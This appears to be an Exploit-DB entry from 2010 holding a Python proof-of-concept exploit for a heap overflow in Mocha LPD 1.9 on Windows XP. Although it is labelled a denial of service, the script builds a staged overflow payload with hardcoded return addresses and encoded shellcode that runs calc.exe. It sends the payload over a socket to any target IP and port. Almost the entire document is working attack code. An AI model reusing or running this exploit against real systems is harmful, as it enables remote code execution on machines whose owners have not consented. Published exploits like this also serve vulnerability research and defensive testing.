Mocha LPD 1.9 - Remote Buffer Overflow (Denial of Service) (PoC)

EDB-ID:

12240

Author:

mr_me

Type:

dos

Platform:

Windows

Published:

2010-04-14

#!/usr/bin/python
# Mocha LPD v1.9 Remote Heap Overflow Exploit
# ol skool 'write 4'
# whoops, I said it was a DoS. My bad. 
# btw yes, I know its 2010 :0)
# CVE: 2010-1687
# tested on XP sp1 
# (use anti debugging to see it work - !hidedebug zwqueryinformationprocess)
# 
# call trace:
# ntdll.RtlAllocateHeap Called from=lpd.0041520B

import sys, socket

print "********************************************************"
print "          Mocha LPD Heap Buffer Overflow Code Execution"
print "                     by mr_me"
print "********************************************************"

if len(sys.argv) < 3:
	print "Usage: " + sys.argv[0] + " <target ip> <port>"
	sys.exit(0)

stage1 = "\x90\x90"
stage1 += "\x61" * 10
stage1 += "\x5b" * 2
stage1 += "\x03\xd2" * 5
stage1 += "\x03\xda" * 47
stage1 += "\xeb\x12"		# jmp down to stage2

stage2 = "\x03\xda" * 125

# aligned to ebx, executes calc.exe via a hardcoded winExec()
# ascii encoded lowercase

sc = ("j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj02b8"
"8731220222b6f507879729d088b9ck0ngmb9e910")

exploit = "\x05\x64\x65\x66\x61\x75\x6c\x74\x20"
exploit += "\xcc" * (975-len(stage1))
exploit += stage1
exploit += "\xeb\x86"		# jmp up to stage1
exploit += "\x44" * 6
exploit += "\xad\xbb\xc3\x77"	# ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += "\xb4\x73\xed\x77"	# EAX 0x77ED73B4 --> ptr to UnhandledExceptionFilter()
exploit += stage2
exploit += "\x90" * 38		# offset to ebx pointed shellcode
exploit += sc
exploit += "\xcc" * (1500-len(exploit))
exploit += "\x20\x61\x6c\x6c\x0a"

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
	connect = s.connect((host,port))
except:
	print "[-] Cant connect!"

s.send("\x02")
print "[+] Sending evil payload.. ph33r o.O"
s.send(exploit)
print '[+] Check for the calc!'
s.close()